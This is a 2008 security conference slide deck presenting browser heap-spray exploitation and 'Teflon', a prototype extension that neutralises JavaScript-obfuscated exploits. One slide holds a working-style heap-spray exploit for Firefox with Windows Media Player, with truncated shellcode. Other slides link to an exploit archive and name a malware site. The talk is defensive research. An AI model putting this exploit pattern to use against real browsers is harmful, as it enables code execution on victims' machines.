![Page 1: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/1.jpg)
Saumil Shah
ceo, net-square
Teflon: Anti-stick for the
browser's attack surface
Hack.LU 2008 – Luxembourg
![Page 2: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/2.jpg)
© n e t - s q u a r e
•! Saumil Shah
ceo, net-square solutions
instructor: "The Exploit Laboratory"
author: "Web Hacking - Attacks and Defense"
# who am i!16:08 up 4:26, 1 user, load averages: 0.28 0.40 0.33!USER TTY FROM LOGIN@ IDLE WHAT!saumil console - 11:43 0:05 bash!
# who am i
![Page 3: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/3.jpg)
© n e t - s q u a r e
Web 2.0's attack surface
•! It's all about the browser.
•! The browser is the desktop of tomorrow...
•! ...and as secure as the desktop of the 90s.
•! The most fertile target area for exploitation.
•!What do today's browsers look like?
![Page 4: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/4.jpg)
© n e t - s q u a r e
Today's average browser
![Page 5: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/5.jpg)
© n e t - s q u a r e
Browser Architecture
DOM
HTML+CSS Javascript
![Page 6: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/6.jpg)
© n e t - s q u a r e
Browser Architecture
DOM
HTML+CSS Javascript A
ctive
X
mim
e t
yp
es
BH
O
Fla
sh
libra
rie
s
user loaded content <img> <iframe> <script> <object> <div> <style> <embed> <span>
<table> <form> <input> ... etc.
![Page 7: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/7.jpg)
© n e t - s q u a r e
Browser Architecture
DOM
HTML+CSS Javascript
Active
X
mim
e t
yp
es
BH
O
Fla
sh
libra
rie
s
user loaded content <img> <iframe> <script> <object> <div> <style>
<embed> <span> <table>
<form> <input> ... etc.
Silv
erlig
ht
AIR
Ajax libs
Ajax/rich
apps
![Page 8: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/8.jpg)
© n e t - s q u a r e
The Browser is Desktop 2.0
"Same Same But Different"
![Page 9: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/9.jpg)
© n e t - s q u a r e
The Browser – Kernel analogy
DOM
HTML+CSS Javascript
Active
X
mim
e t
yp
es
BH
O
Fla
sh
Ge
ars
user loaded content
Silv
erlig
ht
AIR
Ajax libs
Ajax/rich apps
Kernel
System Call libs
Ne
two
rk
File
Syste
m
HID
Dis
pla
y
Sp
l. D
rive
r
Userland programs
Sp
l. D
rive
r
Sp
l. D
rive
r
LibC
C Runtime
Browser OS =
![Page 10: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/10.jpg)
© n e t - s q u a r e
The Browser – Kernel analogy
DOM
HTML+CSS Javascript
Active
X
mim
e t
yp
es
BH
O
Fla
sh
Ge
ars
user loaded content
Silv
erlig
ht
AIR
Ajax libs
Ajax/rich apps
Kernel
System Call libs
Ne
two
rk
File
Syste
m
HID
Dis
pla
y
Sp
l. D
rive
r
Userland programs
Sp
l. D
rive
r
Sp
l. D
rive
r
LibC
C Runtime
= Browser Core Kernel
![Page 11: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/11.jpg)
© n e t - s q u a r e
The Browser – Kernel analogy
DOM
HTML+CSS Javascript
Active
X
mim
e t
yp
es
BH
O
Fla
sh
Ge
ars
user loaded content
Silv
erlig
ht
AIR
Ajax libs
Ajax/rich apps
Kernel
System Call libs
Ne
two
rk
File
Syste
m
HID
Dis
pla
y
Sp
l. D
rive
r
Userland programs
Sp
l. D
rive
r
Sp
l. D
rive
r
LibC
C Runtime
= Plugin / Extensions Drivers
![Page 12: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/12.jpg)
© n e t - s q u a r e
The Browser – Kernel analogy
DOM
HTML+CSS Javascript
Active
X
mim
e t
yp
es
BH
O
Fla
sh
Ge
ars
<H1>hello world</H1>
<script>alert('hi');</script>
Silv
erlig
ht
AIR
Ajax libs
Ajax/rich apps
Kernel
System Call libs
Ne
two
rk
File
Syste
m
HID
Dis
pla
y
Sp
l. D
rive
r
printf("Hello World\n");
Sp
l. D
rive
r
Sp
l. D
rive
r
LibC
C Runtime
= HTML / DHTML / JS Userland code
![Page 13: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/13.jpg)
© n e t - s q u a r e
The Browser – Kernel analogy
DOM
HTML+CSS Javascript
Active
X
mim
e t
yp
es
BH
O
Fla
sh
Ge
ars
<object clsid="XX-YYY-ZZ">
<embed src="file.mp4">
Silv
erlig
ht
AIR
Ajax libs
Ajax/rich apps
Kernel
System Call libs
Ne
two
rk
File
Syste
m
HID
Dis
pla
y
Sp
l. D
rive
r
exec("program.bin");
open("file.mp4");
Sp
l. D
rive
r
Sp
l. D
rive
r
LibC
C Runtime
= <object>, <embed> syscalls
![Page 14: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/14.jpg)
© n e t - s q u a r e
The Browser – Kernel analogy
DOM
HTML+CSS Javascript
Active
X
mim
e t
yp
es
BH
O
Fla
sh
Ge
ars
xhr = new XMLHttpRequest()
Silv
erlig
ht
AIR
Ajax libs
Ajax/rich apps
Kernel
System Call libs
Ne
two
rk
File
Syste
m
HID
Dis
pla
y
Sp
l. D
rive
r
s = socket();
Sp
l. D
rive
r
Sp
l. D
rive
r
LibC
C Runtime
= XHR Sockets
![Page 15: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/15.jpg)
© n e t - s q u a r e
Browser "syscalls"
HTML Loaded
DOM
Javascript HTML
oth
er
libs
Qu
ickT
ime
PD
F
Fla
sh
![Page 16: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/16.jpg)
© n e t - s q u a r e
Browser "syscalls"
DOM
Javascript HTML
oth
er
libs
Qu
ickT
ime
PD
F
Fla
sh
document.write("<object CLSID=XXX-XXXX-XXX>");
![Page 17: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/17.jpg)
© n e t - s q u a r e
Browser "syscalls"
document.write("<object CLSID=XXX-XXXX-XXX>");
Javascript HTML
oth
er
libs
Qu
ickT
ime
PD
F
Fla
sh
DOM
![Page 18: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/18.jpg)
© n e t - s q u a r e
Exploiting a browser
•! Built-in interpreted language – Javascript.
•!Craft the exploit locally, via JS.
•! Pre-load the process memory exactly as you
like, thanks to HTML and JS.
•! Buffer overflows in browsers or components.
•! Practical exploitation – Return to heap.
![Page 19: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/19.jpg)
© n e t - s q u a r e
Exploiting a browser
•! ASLR, DEP, NX, GS, Return to stack, Return
to shared lib, ... doesn't bother us.
•! Spraying the heap, and then jumping into it.
•!Map the memory just-in-time.
•! Pioneered by Skylined.
•! "Heap Feng Shui" by Alexander Sotirov.
![Page 20: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/20.jpg)
© n e t - s q u a r e
Heap Spraying
NOP sled
shellcode
NOP sled
shellcode
NOP sled
shellcode
<script> : spray = build_large_nopsled();
a = new Array();
for(i = 0; i < 100; i++) a[i] = spray + shellcode;
: </script>
<html> :
exploit trigger condition goes here : </html>
a[7]
a[8]
a[9]
![Page 21: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/21.jpg)
© n e t - s q u a r e
How it all works
stack
heap
code and stuff
0xFFFFFFFF
0x00000000
ret EIP
ret EIP
frames
on the stack
var1
var3
var2
var4 overflow in var 3
![Page 22: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/22.jpg)
© n e t - s q u a r e
The Heap...sprayed
stack
code and stuff
0xFFFFFFFF
0x00000000
ret EIP
ret EIP
var1
var3
var2
var4 overflow in var 3
<script> :
for(i = 0; i < 50; i++) a[i] = nops + shellcode;
: </script>
part of the
heap gets "sprayed"
![Page 23: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/23.jpg)
© n e t - s q u a r e
Return to Heap
stack
code and stuff
0xFFFFFFFF
0x00000000
ret EIP
ret EIP
var1
var3
var2
var4 overwrite saved EIP AAAAAAAAAAAAAAAAAAAAAAAAAA heapaddr
<object clsid=XXXXXXXX> exploit trigger in
HTML code
![Page 24: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/24.jpg)
© n e t - s q u a r e
Return to Heap
stack
code and stuff
0xFFFFFFFF
0x00000000
ret EIP
ret EIP
var1
var3
var2
var4 AAAAAAAAAAAAAAAAAAAAAAAAAA heapaddr
Hit one of the
many sprayed blocks.
![Page 25: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/25.jpg)
© n e t - s q u a r e
Demo
•! Step by step – building an exploit.
•! Firefox + Windows Media Player.
•! IE7 LinkedIn Toolbar.
![Page 26: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/26.jpg)
© n e t - s q u a r e
Exploits delivered by Javascript
•! Build up the exploit on-the-fly.
•! and delivered locally.
•! Super obfuscated.
•!Randomly encoded each time.
•! "Signature that!"
![Page 27: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/27.jpg)
© n e t - s q u a r e
Browser defense
•!Dynamic exploitation.
•!Nothing blows up until the last piece of the
puzzle fits.
•!Unless you are "in" the browser, you'll never
know.
•! Anti-Virus quack remedies.
![Page 28: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/28.jpg)
© n e t - s q u a r e
Effectiveness of Anti-Virus software
•!Makes computers sluggish.
•! False alarms.
•! "Most popular brands have an 80% miss
rate" – AusCERT.
•!Heuristic recognition fell from 40-50% (2006)
to 20-30% (2007) – HeiseOnline.
•! Signature based scanning does not work.
•! A-I techniques can be easily beaten.
![Page 29: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/29.jpg)
© n e t - s q u a r e
New directions of R&D
•!NoScript extension.
•! slightly better than "turn off JS for everything".
•! default deny, selected allow approach.
•!Per site basis – list building exercise.
•! Analysis through Spidermonkey.
•!Roots in understanding obfuscated malware.
![Page 30: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/30.jpg)
© n e t - s q u a r e
New directions of R&D
•!Hooking into the JS engine via debuggers. •!http://securitylabs.websense.com/content/Blogs/
2802.aspx
![Page 31: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/31.jpg)
© n e t - s q u a r e
Teflon
•! An attempt to protect browsers against JS
encoded exploits.
•!Doesn't allow anything to stick.
•! Per-site JS disabling is too drastic.
•! or for that matter whitelisting/blacklisting.
•! I hate maintaining lists.
•! Are you sure facebook won't deliver malware
tomorrow?
![Page 32: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/32.jpg)
© n e t - s q u a r e
Teflon - objectives
•!Deep inspection of payload.
•! Just block the offensive vectors.
•! define offensive.
•! allow the rest.
•!No need to disable JS.
•! ...just prevent the browser "syscalls".
•! Implemented as a browser extension.
•! Ideally this technology should be part of the
browser's "kernel".
![Page 33: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/33.jpg)
© n e t - s q u a r e
Teflon 0.2
•! Firefox 1.5-2.0 implementation.
•!Modifications to the DOM.
•! document.write, innerHTML, eval, etc.
•! Takes care of recursive javascript
obfuscation.
•!Replaces offensive vectors with <div>s.
![Page 34: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/34.jpg)
© n e t - s q u a r e
Teflon 0.2 – lab tests
•! Firefox+Windows Media Player (MS06-006)
•! http://milw0rm.com/exploits/1505
•! Bare exploit - The Exploit Lab style!
•! Packed with /packer/
•! http://dean.edwards.name/packer/
•! Scriptasylum JS encoder/decoder
•! http://scriptasylum.com/tutorials/encdec/encode-
decode.html
•! Both packer+encoder together.
![Page 35: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/35.jpg)
© n e t - s q u a r e
Plain vanilla exploit
<script> // calc.exe var shellcode = unescape("%ue8fc%u0044%u0000%u458b....... ......%u6c61%u2e63%u7865%u2065%u0000");
// heap spray var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090"); do { spray += spray; } while(spray.length < 0xc0000); memory = new Array(); for(i = 0; i < 50; i++) memory[i] = spray + shellcode;
// we need approx 2200 A's to blow the buffer buf = ""; for(i = 0; i < 550; i++) buf += unescape("%05%05%05%05"); buf += ".wmv";
document.write('<embed src="' + buf + '"></embed>'); </script>
![Page 36: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/36.jpg)
© n e t - s q u a r e
/packer/
![Page 37: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/37.jpg)
© n e t - s q u a r e
Scriptasylum encoder/decoder
![Page 38: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/38.jpg)
© n e t - s q u a r e
Demo
•! Teflon against plain vanilla exploit.
•! Teflon against /packer/.
•! Teflon against JS encoder.
•! Teflon against packer+encoder.
![Page 39: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/39.jpg)
© n e t - s q u a r e
Teflon 0.2 – in the wild
•! Tested against www.cuteqq.cn malware.
•! Encrypted and randomized JS delivery.
•!MS07004 – IE VML bug.
![Page 40: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/40.jpg)
© n e t - s q u a r e
Without Teflon – 0wned
![Page 41: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/41.jpg)
© n e t - s q u a r e
Without Teflon – 0wned
![Page 42: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/42.jpg)
© n e t - s q u a r e
With Teflon – harmless div
![Page 43: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/43.jpg)
© n e t - s q u a r e
With Teflon – harmless div
![Page 44: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/44.jpg)
© n e t - s q u a r e
Teflon – practical deployment
•!Right now, it is just a research prototype.
•!How shall we use it in practice?
•!Web servers can publish a "manifest" of
what is allowed (or denied).
•! e.g. "My web pages should never contain
OBJECTs or EMBEDs"
•! or: "Only CLSID xyz is allowed"
•!maybe like P3P? (we all know where that went)
![Page 45: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/45.jpg)
© n e t - s q u a r e
Teflon 0.2 - Limitations
•! Javascript is too powerful (read dangerous).
•! "I was here first!" approach.
•! Teflon really needs to be built right into the
browser.
![Page 46: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/46.jpg)
© n e t - s q u a r e
Where are browsers headed?
•! Let's mash-up EVERYTHING.
•! Standards driven by bloggers and Twits.
•!We need a standard, granular security
model for browsers – built in.
•!Web servers, app frameworks need to play a
role too.
javascript is
everything
WebSlices -
WTF
finally getting
a decent UI
totally on
ACID
fugly little
snitch
![Page 47: Teflon: Anti-stick for the browser's attack surface · Saumil Shah ceo, net-square Teflon: Anti-stick for the browser's attack surface Hack.LU 2008 – Luxembourg](https://reader033.vdocuments.us/reader033/viewer/2022042104/5e81eced85915f62c97038fc/html5/thumbnails/47.jpg)
© n e t - s q u a r e
Future R&D directions
•!Can we detect heap sprays?
•!Non-executable heap? it does exist...
•! Signed Javascript, JARs?
•! Browser "syscall" protection.
•!Weren't Java applets supposed to be
perfect? :-)